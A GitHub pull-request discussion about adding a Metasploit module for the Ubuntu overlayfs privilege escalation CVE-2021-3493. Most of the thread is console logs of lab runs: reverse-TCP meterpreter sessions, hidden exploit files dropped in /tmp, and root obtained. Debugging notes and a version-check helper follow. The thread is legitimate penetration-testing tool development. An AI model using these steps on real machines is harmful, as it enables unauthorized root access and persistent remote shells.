
Add cve-2021-3493 module #15822

Merged (11 commits) Dec 2, 2021

Conversation

bwatters-r7
Contributor

@bwatters-r7 bwatters-r7 commented Nov 3, 2021

This adds a module for the cve-2021-3493 overlay fs local privilege escalation for Ubuntu versions 14.04 - 20.10.

  • Start msfconsole
  • get a session with standard privilege
  • use exploit/linux/local/cve_2021_3493_overlayfs
  • set session <session>
  • set COMPILE False
  • run
  • be root
  • exit
  • set COMPILE True
  • run
  • be root again

I'm leaving this as a draft because currently it:

  1. Only uses the precompiled binary
  2. Has crap for a check method
  3. Has no documentation
    (Added) 4. The C code needs some work to make it less obvious

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp 
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.135.197
lhost => 192.168.135.197
msf6 exploit(multi/handler) > set lport 4567
lport => 4567
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.135.197:4567 
[*] Sending stage (3012548 bytes) to 192.168.134.116
[*] Meterpreter session 1 opened (192.168.135.197:4567 -> 192.168.134.116:60796 ) at 2021-11-03 13:41:36 -0500

meterpreter > sysinfo
Computer     : 192.168.134.116
OS           : Ubuntu 18.04 (Linux 4.15.0-29-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: msfuser
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use exploit/linux/local/cve_2021_3493_overlayfs 
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > show options

Module options (exploit/linux/local/cve_2021_3493_overlayfs):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.135.197  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Auto


msf6 exploit(linux/local/cve_2021_3493_overlayfs) > set session 1
session => 1
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > set verbose true
verbose => true
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > run

[*] Started reverse TCP handler on 192.168.135.197:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Dropping pre-compiled exploit on system...
[*] Writing '/tmp/.M2OwFGor' (17880 bytes) ...
[*] Writing '/tmp/.tjEwB' (250 bytes) ...
[*] Launching exploit...
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3012548 bytes) to 192.168.134.116
[+] Deleted /tmp/.M2OwFGor
[+] Deleted /tmp/.tjEwB
[*] Meterpreter session 2 opened (192.168.135.197:4444 -> 192.168.134.116:55986 ) at 2021-11-03 13:42:13 -0500

meterpreter > sysinfo
Computer     : 192.168.134.116
OS           : Ubuntu 18.04 (Linux 4.15.0-29-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
meterpreter > exit


@bcoles bcoles added the module label Nov 4, 2021
@bwatters-r7
Contributor Author

bwatters-r7 commented Nov 9, 2021

OK, so after the changes, I tested on a couple of platforms. We might need to do some finer work with minor versions on the tail ends of vulnerability. In theory, the 20.04 should be vulnerable, but my updated dev VM is not, and one of the 16.04 VMs should have been vulnerable, but was not. I think it is likely less of an issue because if the VM was not vulnerable and it ran it anyway, you just get a shell back with the same privileges you had before. No crash or explosions. The method of controlling the directories created during the exploit is somewhat unorthodox, but it works. Taking this out of draft once I get the documentation done.

Ubuntu 18.04
[*] Meterpreter session 1 opened (192.168.135.197:4567 -> 192.168.134.116:45910 ) at 2021-11-09 10:37:18 -0600

meterpreter > sysinfo
Computer     : 192.168.134.116
OS           : Ubuntu 18.04 (Linux 4.15.0-29-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: msfuser
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use exploit/linux/local/cve_2021_3493_overlayfs 
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > show options

Module options (exploit/linux/local/cve_2021_3493_overlayfs):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   COMPILE  Auto             yes       Compile on target (Accepted: Auto, True, False)
   SESSION                   yes       The session to run this module on


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.135.197  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Auto


msf6 exploit(linux/local/cve_2021_3493_overlayfs) > set session 1
session => 1
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > set verbose true
verbose => true
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > set COMPILE True 
COMPILE => True
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > run

[*] Started reverse TCP handler on 192.168.135.197:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Version array: ["4.15.0", "29", "generic"]
[*] major_version: 4.15.0
[*] minor_version: 29
[+] The target appears to be vulnerable.
[*] Creating directory /tmp/.c2sqf
[*] /tmp/.c2sqf created
[+] gcc is installed
[*] Live compiling exploit on system...
[*] Trying to write file
[*] Trying to compile file
[*] Done
[*] Writing '/tmp/.c2sqf/.x7YzB' (250 bytes) ...
[*] Launching exploit...
[*] Running: /tmp/.c2sqf/.DWmV0X2 /tmp/.c2sqf/.x7YzB /tmp/.c2sqf x0T5WyJtW
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3012548 bytes) to 192.168.134.116
[+] Deleted /tmp/.c2sqf/.DWmV0X2
[*] Meterpreter session 2 opened (192.168.135.197:4444 -> 192.168.134.116:55098 ) at 2021-11-09 10:38:00 -0600
[*] 

meterpreter > sysinfo
Computer     : 192.168.134.116
OS           : Ubuntu 18.04 (Linux 4.15.0-29-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.134.116 - Meterpreter session 2 closed.  Reason: Died
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > set COMPILE False 
COMPILE => False
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > run

[*] Started reverse TCP handler on 192.168.135.197:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Version array: ["4.15.0", "29", "generic"]
[*] major_version: 4.15.0
[*] minor_version: 29
[+] The target appears to be vulnerable.
[*] Creating directory /tmp/.MH3N0Af
[*] /tmp/.MH3N0Af created
[*] Dropping pre-compiled exploit on system...
[*] Writing '/tmp/.MH3N0Af/.5lGtywsO' (17840 bytes) ...
[*] Writing '/tmp/.MH3N0Af/.sn3gFrmRh' (250 bytes) ...
[*] Launching exploit...
[*] Running: /tmp/.MH3N0Af/.5lGtywsO /tmp/.MH3N0Af/.sn3gFrmRh /tmp/.MH3N0Af ZfBdcy9L7
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3012548 bytes) to 192.168.134.116
[+] Deleted /tmp/.MH3N0Af/.5lGtywsO
[*] Meterpreter session 3 opened (192.168.135.197:4444 -> 192.168.134.116:55102 ) at 2021-11-09 10:38:31 -0600
[*] 

meterpreter > sysinfo
Computer     : 192.168.134.116
OS           : Ubuntu 18.04 (Linux 4.15.0-29-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.134.116 - Meterpreter session 3 closed.  Reason: User exit
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > 

Fedora 31
msf6 payload(linux/x64/meterpreter/reverse_tcp) > 
[*] Sending stage (3012548 bytes) to 192.168.134.127
[*] Meterpreter session 5 opened (192.168.135.197:4567 -> 192.168.134.127:39578 ) at 2021-11-09 11:27:03 -0600

msf6 payload(linux/x64/meterpreter/reverse_tcp) > session -i 5
[-] Unknown command: session
msf6 payload(linux/x64/meterpreter/reverse_tcp) > sessions -i 5
[*] Starting interaction with 5...

meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Fedora 31 (Linux 5.3.7-301.fc31.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: msfuser
meterpreter > background
[*] Backgrounding session 5...
msf6 payload(linux/x64/meterpreter/reverse_tcp) > use exploit/linux/local/cve_2021_3493_overlayfs 
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > set session 5
session => 5
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > set verbose true
verbose => true
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > check
[*] The target is not exploitable. Target is not Ubuntu!

Ubuntu 16.04
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > sessions -i 6
[*] Starting interaction with 6...

meterpreter > sysinfo
Computer     : ubuntu16.04.1x64
OS           : Ubuntu 16.04 (Linux 4.4.0-31-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: msfuser
meterpreter > background
[*] Backgrounding session 6...
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > use exploit/linux/local/cve_2021_3493_overlayfs 
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > set verbose true
verbose => true
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > set session 6
session => 6
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > run

[*] Started reverse TCP handler on 192.168.135.197:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Version array: ["4.4.0", "31", "generic"]
[*] major_version: 4.4.0
[*] minor_version: 31
[+] The target appears to be vulnerable.
[*] Creating directory /tmp/.EQYLbHV8
[*] /tmp/.EQYLbHV8 created
[*] Dropping pre-compiled exploit on system...
[*] Writing '/tmp/.EQYLbHV8/.zzWxj' (17840 bytes) ...
[*] Writing '/tmp/.EQYLbHV8/.OfMkFz' (250 bytes) ...
[*] Launching exploit...
[*] Running: /tmp/.EQYLbHV8/.zzWxj /tmp/.EQYLbHV8/.OfMkFz /tmp/.EQYLbHV8 Sz8cE1C4
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3012548 bytes) to 192.168.132.148
[+] Deleted /tmp/.EQYLbHV8/.zzWxj
[*] Meterpreter session 7 opened (192.168.135.197:4444 -> 192.168.132.148:53904 ) at 2021-11-09 11:31:14 -0600
[*] .zzWxj: setxattr /tmp/.EQYLbHV8/mz8cE1C4/Mz8cE1C4: Operation not permitted

meterpreter > getuid
Server username: msfuser

Ubuntu 20.04

msf6 exploit(linux/local/cve_2021_3493_overlayfs) > 
[*] Sending stage (3012548 bytes) to 192.168.132.138
[*] Meterpreter session 9 opened (192.168.135.197:4567 -> 192.168.132.138:47988 ) at 2021-11-09 11:34:44 -0600

msf6 exploit(linux/local/cve_2021_3493_overlayfs) > sessions -i 9
[*] Starting interaction with 9...

meterpreter > sysinfo
Computer     : ubuntu-20.04.0
OS           : Ubuntu 20.04 (Linux 5.4.0-26-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: msfuser
meterpreter > background
[*] Backgrounding session 9...
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > set session 9
session => 9
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > run

[*] Started reverse TCP handler on 192.168.135.197:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Version array: ["5.4.0", "26", "generic"]
[*] major_version: 5.4.0
[*] minor_version: 26
[+] The target appears to be vulnerable.
[*] Creating directory /tmp/.wH0xRHji
[*] /tmp/.wH0xRHji created
[*] Dropping pre-compiled exploit on system...
[*] Writing '/tmp/.wH0xRHji/.PsJzzn' (17840 bytes) ...
[*] Writing '/tmp/.wH0xRHji/.Doeg4dSW1G' (250 bytes) ...
[*] Launching exploit...
[*] Running: /tmp/.wH0xRHji/.PsJzzn /tmp/.wH0xRHji/.Doeg4dSW1G /tmp/.wH0xRHji 6PFbO1d
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3012548 bytes) to 192.168.132.138
[+] Deleted /tmp/.wH0xRHji/.PsJzzn
[*] Meterpreter session 10 opened (192.168.135.197:4444 -> 192.168.132.138:41814 ) at 2021-11-09 11:35:05 -0600
[*] 

meterpreter > getuid
Server username: root

Ubuntu 20.04.2
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > 
[*] Sending stage (3012548 bytes) to 192.168.132.172
[*] Meterpreter session 11 opened (192.168.135.197:4567 -> 192.168.132.172:57574 ) at 2021-11-09 11:44:00 -0600

msf6 exploit(linux/local/cve_2021_3493_overlayfs) > sessions -i -1
[*] Starting interaction with 11...

meterpreter > sysinfo
Computer     : 192.168.132.172
OS           : Ubuntu 20.04 (Linux 5.8.0-41-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: msfuser
meterpreter > background
[*] Backgrounding session 11...
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > set session 11
session => 11
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > run

[*] Started reverse TCP handler on 192.168.135.197:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Version array: ["5.8.0", "41", "generic"]
[*] major_version: 5.8.0
[*] minor_version: 41
[+] The target appears to be vulnerable.
[*] Creating directory /tmp/.0rD2H3uA
[*] /tmp/.0rD2H3uA created
[*] Dropping pre-compiled exploit on system...
[*] Writing '/tmp/.0rD2H3uA/.9zORT3' (17840 bytes) ...
[*] Writing '/tmp/.0rD2H3uA/.YQuFXL' (250 bytes) ...
[*] Launching exploit...
[*] Running: /tmp/.0rD2H3uA/.9zORT3 /tmp/.0rD2H3uA/.YQuFXL /tmp/.0rD2H3uA p7lOENBX
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3012548 bytes) to 192.168.132.172
[+] Deleted /tmp/.0rD2H3uA/.9zORT3
[*] Meterpreter session 12 opened (192.168.135.197:4444 -> 192.168.132.172:40896 ) at 2021-11-09 11:44:25 -0600
[*] 

meterpreter > sysinfo
Computer     : 192.168.132.172
OS           : Ubuntu 20.04 (Linux 5.8.0-41-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
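The verbose output above shows what the check method looks at (Ubuntu only, the kernel release split into a "Version array" with major and minor parts, and whether unprivileged user namespaces are permitted) and the thread notes that minor versions on the tail ends need care. The following Ruby helper is an added example that is not the module's code: it reproduces those checks on constructed input and shows why the ABI number must be compared numerically rather than as a string. `FIXED_FOR_DEMO` and the sample `/etc/os-release` and sysctl text are constructed placeholders, not real fix levels.

```ruby
# Added example, not code from the Metasploit module. Mirrors the checks the
# module's verbose output reveals and compares kernel releases numerically.

# "4.15.0-29-generic" -> ["4.15.0", "29", "generic"], as the module prints it.
def version_array(release)
  release.to_s.strip.split('-', 3)
end

# Numeric key [major, minor, patch, abi] so releases sort correctly.
def release_key(release)
  arr = version_array(release)
  raise ArgumentError, "unexpected kernel release #{release.inspect}" if arr.size < 2
  major, minor, patch = arr[0].split('.').map(&:to_i)
  [major.to_i, minor.to_i, patch.to_i, arr[1].to_i]
end

# true when release is strictly older than fixed_release (numeric comparison).
def older_than?(release, fixed_release)
  (release_key(release) <=> release_key(fixed_release)) < 0
end

# Plain string comparison, kept only to show the pitfall: "135" < "29" lexically,
# so an ABI 135 kernel would wrongly look older than an ABI 29 kernel.
def older_than_lexically?(release, fixed_release)
  release < fixed_release
end

# /etc/os-release carries ID=ubuntu on Ubuntu; the module refuses other distros.
def ubuntu?(os_release_text)
  os_release_text.each_line.any? do |line|
    key, value = line.strip.split('=', 2)
    key == 'ID' && value.to_s.delete('"').casecmp('ubuntu').zero?
  end
end

# Parses "kernel.unprivileged_userns_clone = 1" (sysctl output) or a bare "1"
# (the /proc/sys file); assumption: this Ubuntu/Debian sysctl is what is consulted.
def userns_permitted?(sysctl_text)
  sysctl_text.to_s.strip.split('=').last.to_s.strip == '1'
end

# Constructed placeholder for the first non-vulnerable ABI; NOT a real fix level.
FIXED_FOR_DEMO = '4.15.0-200-generic'.freeze

# Constructed sample inputs standing in for a read of the target's files.
SAMPLE_OS_RELEASE = "NAME=\"Ubuntu\"\nID=ubuntu\nVERSION_ID=\"18.04\"\n".freeze
SAMPLE_SYSCTL = "kernel.unprivileged_userns_clone = 1\n".freeze

# Combined verdict in the order the module's output reports its checks.
def check_status(os_release_text, kernel_release, sysctl_text, fixed_release)
  return :not_ubuntu unless ubuntu?(os_release_text)
  return :userns_disabled unless userns_permitted?(sysctl_text)
  older_than?(kernel_release, fixed_release) ? :appears_vulnerable : :safe
end

if $PROGRAM_NAME == __FILE__
  puts "Version array: #{version_array('4.15.0-29-generic').inspect}"
  puts check_status(SAMPLE_OS_RELEASE, '4.15.0-29-generic', SAMPLE_SYSCTL, FIXED_FOR_DEMO)
end
```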

@bwatters-r7 bwatters-r7 marked this pull request as ready for review November 9, 2021 21:34
@dwelch-r7 dwelch-r7 self-assigned this Nov 11, 2021
@bwatters-r7
Contributor Author

Let's hold off momentarily and see if this will work with other architectures like ARM and x86

@dwelch-r7
Contributor

Couple quick notes from testing today (going to hold off on further testing until we see if it works with other architectures)

I ran into the issue you mentioned running into on Ubuntu 20.04, where it said it was vulnerable but came back with a new session with the same privileges as the previous session.

When testing out on Ubuntu 18.04 with a python meterpreter session I ran into this:

msf6 exploit(linux/local/cve_2021_3493_overlayfs) > run

[!] SESSION may not be compatible with this module:
[!]  * incompatible session architecture: python
[*] Started reverse TCP handler on 172.28.128.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. System architecture  is not supported "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.

I assumed this exploit should work with python and other non-native meterpreters

I went and overrode the check by setting ForceExploit to true and ran into a different issue, which may be unrelated and instead a problem with my environment, but I'm not sure:

msf6 exploit(linux/local/cve_2021_3493_overlayfs) > set FOrceExploit true 
FOrceExploit => true
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > run

[!] SESSION may not be compatible with this module:
[!]  * incompatible session architecture: python
[*] Started reverse TCP handler on 172.28.128.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The target is not exploitable. System architecture  is not supported ForceExploit is enabled, proceeding with exploitation.
[-] Exploit aborted due to failure: bad-config: /tmp is not writable
[*] Exploit completed, but no session was created.

@timwr
Contributor

timwr commented Nov 11, 2021

FYI, if you expose a vulnerable Ubuntu installation to the internet it will automagically grab the patch for this (I think it's an option under Software and Updates > Updates > When there are security updates: automatically download and install automatically).

@bwatters-r7
Contributor Author

bwatters-r7 commented Nov 11, 2021

The curse of infosec research: It's a good thing when people make your life miserable.....

@bwatters-r7
Contributor Author

bwatters-r7 commented Nov 18, 2021

OK.... First off, it does work right out of the box for ARM64, but I did find that installing build-essential seemed to patch the bug. I had to get an arm VM running, then install build-essential, then use the pre-compiled binary on the exact same VM image I was using before, but that had never connected to the internet.
Specifically, I was using the cloud image I found here: http://cloud-images-archive.ubuntu.com/releases/bionic/release-20210129/ubuntu-18.04-server-cloudimg-arm64.img on a QEMU VM running in VMM. It worked pretty well and if you want to recreate it, I'll throw the steps in at the end.
Edit: I got segfaults with staged meterpreter payloads as a non-root user on aarch64 Ubuntu, but a stageless payload worked fine.

msf6 exploit(linux/local/cve_2021_3493_overlayfs) > sessions -i 13
[*] Starting interaction with 13...

meterpreter > sysinfo
Computer     : 192.168.122.36
OS           : Ubuntu 18.04 (Linux 4.15.0-135-generic)
Architecture : aarch64
BuildTuple   : aarch64-linux-musl
Meterpreter  : aarch64/linux
meterpreter > getuid
Server username: msfuser
meterpreter > background
[*] Backgrounding session 13...
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > show options

Module options (exploit/linux/local/cve_2021_3493_overlayfs):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   COMPILE  False            yes       Compile on target (Accepted: Auto, True, False)
   SESSION  13               yes       The session to run this module on


Payload options (linux/aarch64/meterpreter_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.5.135.101     yes       The listen address (an interface may be specified)
   LPORT  7548             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Auto


msf6 exploit(linux/local/cve_2021_3493_overlayfs) > run

[*] Started reverse TCP handler on 10.5.135.101:7548 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Version array: ["4.15.0", "135", "generic"]
[*] major_version: 4.15.0
[*] minor_version: 135
[+] The target appears to be vulnerable.
[*] Creating directory /tmp/.5NrNqi
[*] /tmp/.5NrNqi created
[*] Dropping pre-compiled exploit on system...
[*] Writing '/tmp/.5NrNqi/.7MJJcT' (14288 bytes) ...
[*] Writing '/tmp/.5NrNqi/.guGGbZoz' (1108192 bytes) ...
[*] Launching exploit...
[*] Running: /tmp/.5NrNqi/.7MJJcT /tmp/.5NrNqi/.guGGbZoz /tmp/.5NrNqi 0XYKs8I44
[+] Deleted /tmp/.5NrNqi/.7MJJcT
[*] Meterpreter session 15 opened (10.5.135.101:7548 -> 10.5.132.107:56678 ) at 2021-11-18 13:03:20 -0600
[*] 

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.122.36
OS           : Ubuntu 18.04 (Linux 4.15.0-135-generic)
Architecture : aarch64
BuildTuple   : aarch64-linux-musl
Meterpreter  : aarch64/linux
meterpreter > 

To do this, I installed Virtual Machine Manager and QEMU, then downloaded the image above.
I ran this command to change the username/password on the image before booting (you can do it after, too):
sudo virt-customize -a <imagename> --root-password password:<yourcrappypassword>
You might need to install something new to get that to run; I think I did, but I don't remember what it was.
Anyway, then go into the VMM and select 'New' machine.

Import Disk (click the dropdown for Architecture options and select aarch64).
Select the proper image and identify it as Ubuntu 18.04.
The rest is straightforward: selecting cores and memory.

@bwatters-r7
Contributor Author

@dwelch-r7 that is odd with Python. Specifically, the line here:
[!] The target is not exploitable. System architecture is not supported ForceExploit is enabled, proceeding with exploitation.
You can see that there are two spaces between "architecture" and "is" because that's where the arch value gets printed (line ~62). That leads me to believe that there are no arch values returning....

After checking, that's the case. The module uses a call to kernel_hardware to retrieve the architecture, and it returns nothing:

msf6 exploit(linux/local/cve_2021_3493_overlayfs) > check

[!] SESSION may not be compatible with this module:
[!]  * incompatible session architecture: python
[*] Version array: ["4.15.0", "29", "generic"]
[*] major_version: 4.15.0
[*] minor_version: 29
[*] The target appears to be vulnerable.
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > irb
[*] Starting IRB shell...
[*] You are in exploit/linux/local/cve_2021_3493_overlayfs

>> kernel_hardware
=> ""
>> 

That's super odd, as the method for kernel_hardware is just:

  #
  # Returns the kernel hardware
  #
  # @return [String]
  #
  def kernel_hardware
    uname('-m')
  end

OK.... I think this is a bug with python meterpreter. When I connect with an elf meterpreter I can run the check, and then use irb to see that we're properly pulling the kernel_hardware value:

msf6 exploit(linux/local/cve_2021_3493_overlayfs) > check

[*] Version array: ["4.15.0", "29", "generic"]
[*] major_version: 4.15.0
[*] minor_version: 29
[*] The target appears to be vulnerable.
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > irb
[*] Starting IRB shell...
[*] You are in exploit/linux/local/cve_2021_3493_overlayfs

>> kernel_hardware
=> "x86_64"
>> cmd_exec('uname')
=> "Linux"
>> cmd_exec('uname -a')
=> "Linux ubuntu-18041 4.15.0-29-generic #31-Ubuntu SMP Tue Jul 17 15:39:52 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux"
>> cmd_exec('uname -m')
=> "x86_64"
>> exit

On a python session, I can't get any of that, and the cmd_exec fails...

msf6 exploit(linux/local/cve_2021_3493_overlayfs) > set session 16
session => 16
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > check

[!] SESSION may not be compatible with this module:
[!]  * incompatible session architecture: python
[*] The target is not exploitable. System architecture  is not supported
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > irb
[*] Starting IRB shell...
[*] You are in exploit/linux/local/cve_2021_3493_overlayfs

>> kernel_hardware
=> ""
>> cmd_exec('uname')
=> ""
>> cmd_exec('uname -a')
=> ""
>> cmd_exec('uname -m')
=> ""
>> 

I'm blaming Python, personally.

@timwr
Contributor

timwr commented Nov 18, 2021

@bwatters-r7 you might want to try rebasing this on top of #15805 as it includes some fixes for python meterpreter cmd_exec.

@bwatters-r7
Contributor Author

@timwr here I was about to write an issue in Payloads, too! Now, it is just going to be an issue in mettle (I hope)!

@bwatters-r7
Contributor Author

Rebasing no longer gives me an error, but also, it does not work....

msf6 exploit(linux/local/cve_2021_3493_overlayfs) > set autocheck true
autocheck => true
msf6 exploit(linux/local/cve_2021_3493_overlayfs) > run

[!] SESSION may not be compatible with this module:
[!]  * incompatible session architecture: python
[*] Started reverse TCP handler on 10.5.135.101:5555 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Version array: ["4.15.0", "29", "generic"]
[*] major_version: 4.15.0
[*] minor_version: 29
[+] The target appears to be vulnerable.
[*] Creating directory /tmp/.jytz04sBD
[*] /tmp/.jytz04sBD created
[*] Detected architecture: x86_64
[*] Dropping pre-compiled exploit on system...
[*] Dropping pre-compiled exploit cve_2021_3493.x64.elf on system...
[*] Writing '/tmp/.jytz04sBD/.IBnrB0' (17840 bytes) ...
[*] Writing '/tmp/.jytz04sBD/.cnk2Fwtx' (250 bytes) ...
[*] Launching exploit...
[*] Running: /tmp/.jytz04sBD/.IBnrB0 /tmp/.jytz04sBD/.cnk2Fwtx /tmp/.jytz04sBD Zh8YkZJ2D
[*] 
[*] Exploit completed, but no session was created.

@bwatters-r7
Contributor Author

OK... so the TL;DR is that this works on the binary payload, but fails on python payloads:

    random_string = rand_text_alphanumeric(5..10)
    args = "#{payload_path} #{exploit_dir} #{random_string}"
    begin
      output = cmd_exec(exploit_path, args)

This works on both:

    random_string = rand_text_alphanumeric(5..10)
    cmd_string = "#{exploit_path} #{payload_path} #{exploit_dir} #{random_string}"
    vprint_status("Running: #{cmd_string}")
    begin
      output = cmd_exec(cmd_string)

Looks like there is a mismatch with how cmd_exec works on python vs binary. I did not dig into the python meterpreter code, though. I'm just going to switch to the second example.
I also rebased and added a check to make sure the payload and target arch match.

@bwatters-r7
Contributor Author

FWIW, you can verify this behavior by getting a python meterpreter session and a binary meterpreter session, then running :
cmd_exec('ls -larth')
cmd_exec('ls', '-larth')
In theory, these should be the same, but they are not.

@dwelch-r7
Contributor

Got it working on a native meterpreter; it took a couple of goes to find an actually vulnerable version, though, even though the check method told me all the ones I tried were vulnerable.

Unfortunately, even with your changes the python meterpreter isn't working for me 😬
Not sure what the deal is here.

Also, a minor point: when you use the module the default payload is for ARM, which I think is probably not the most compatible default payload.

@dwelch-r7
Contributor

Almost forgot: it totally works with compiling on the target too.

@bwatters-r7
Contributor Author

@dwelch-r7 unfortunately, targeting is hard..... The bright side is that nothing happens on a machine that's been patched. Tim suggested they shadow patch when connected to the internet, and I think he's right.
I agree on the payload selection. I lost a bit of time yesterday because I mismatched the payloads a couple times, so I rage-yeeted in a check to make sure the payload/target arch matched, but in the light of morning, I should be able to just add a default payload to the target selection, which would be much smarter.

@bwatters-r7
Contributor Author

Also, checking on that failure on python.... it looks maybe like the cleanup happened before the launch? I'll look into that real quick, too.

@bwatters-r7
Contributor Author

Huh.... I swung and missed on this one.
Literally found the root cause and prepped for it, then it looks like I forgot to commit a change to the actual cmd_exec call. Fix for the payload and pythons incoming....

@bwatters-r7
Contributor Author

Also, I'll put this here: the python meterpreter is still failing, sort of:

msf6 exploit(linux/local/cve_2021_3493_overlayfs) > run

[!] SESSION may not be compatible with this module:
[!]  * incompatible session architecture: python
[*] Started reverse TCP handler on 10.5.135.101:6582 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Version array: ["5.8.0", "41", "generic"]
[*] major_version: 5.8.0
[*] minor_version: 41
[+] The target appears to be vulnerable.
[*] Creating directory /tmp/.2xBcXkoS
[*] /tmp/.2xBcXkoS created
[*] Detected architecture: x86_64
[*] Dropping pre-compiled exploit on system...
[*] Dropping pre-compiled exploit cve_2021_3493.x64.elf on system...
[*] Writing '/tmp/.2xBcXkoS/.UqNSs' (17840 bytes) ...
[*] Writing '/tmp/.2xBcXkoS/.x3T5V2x5' (250 bytes) ...
[*] Launching exploit...
[*] Running: /tmp/.2xBcXkoS/.UqNSs /tmp/.2xBcXkoS/.x3T5V2x5 /tmp/.2xBcXkoS 6ipS5bd
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3012548 bytes) to 10.5.132.102
[+] Deleted /tmp/.2xBcXkoS/.UqNSs
[*] Meterpreter session 10 opened (10.5.135.101:6582 -> 10.5.132.102:39130 ) at 2021-12-02 07:49:46 -0600
[*] 
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] run: Interrupted

It seems to hang on the remove if you're in a python session, but once you exit the new session, the rm finishes and cleans up.

@bwatters-r7
Contributor Author

Linux 20.04.02 With Binary Payload

msf6 exploit(linux/local/cve_2021_3493_overlayfs) > sessions -l

Active sessions
===============

  Id  Name  Type                   Information             Connection
  --  ----  ----                   -----------             ----------
